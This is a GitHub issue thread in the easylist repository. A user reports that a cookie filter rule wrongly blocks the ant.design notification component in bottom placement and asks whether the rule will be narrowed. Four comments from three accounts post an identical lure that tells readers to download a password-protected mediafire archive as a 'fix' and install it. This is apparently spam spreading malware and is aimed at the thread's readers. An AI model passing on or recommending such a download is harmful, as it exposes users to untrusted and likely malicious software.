### ISSUE TITLE
https://ant.design/components/notification

### ISSUE THREAD

**Issue by samcolby** [easylist/easylist#19898]
#### List the website(s) you're having issues with:

- https://ant.design/
- I guess quite a few other sites

#### What happens?

Blocking standard react component library features.  This is either a false positive or it needs to be more specific than just the standard component classes.

#### Screenshot(s) 

If you click on the `bottom` button on this page, you will see it is blocked.  The other orientations are fine
https://ant.design/components/notification

![image](https://github.com/user-attachments/assets/54ebf59a-7903-408c-b4b6-284b13352a8c)

#### Filter lists you're using:

Easylist cookies

#### Your settings:

- OS/version: 
- Browser/version: 
- Ad block extension/version: 

MacOS Sonoma
Brave with shields up 1.69.153

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ryanbr** [comment]
Why remove it? why not just for this site?

**Comment by samcolby** [comment]
> Why remove it? why not just for this site?

These are standard class names for this component library that will be used in quite a few websites. I was just using this site as an example. We have a couple of other password protected sites that this affects too. 

It’s quite a popular component library

**Comment by samcolby** [comment]
Hello, just checking if this is a wont fix or not?  

It's definitely a false positive as it's currently breaking some of our apps.  Just need to know if we need to work around this on our side.

**Comment by samcolby** [comment]
Thanks for your help @ryanbr and all you're doing here 🙌
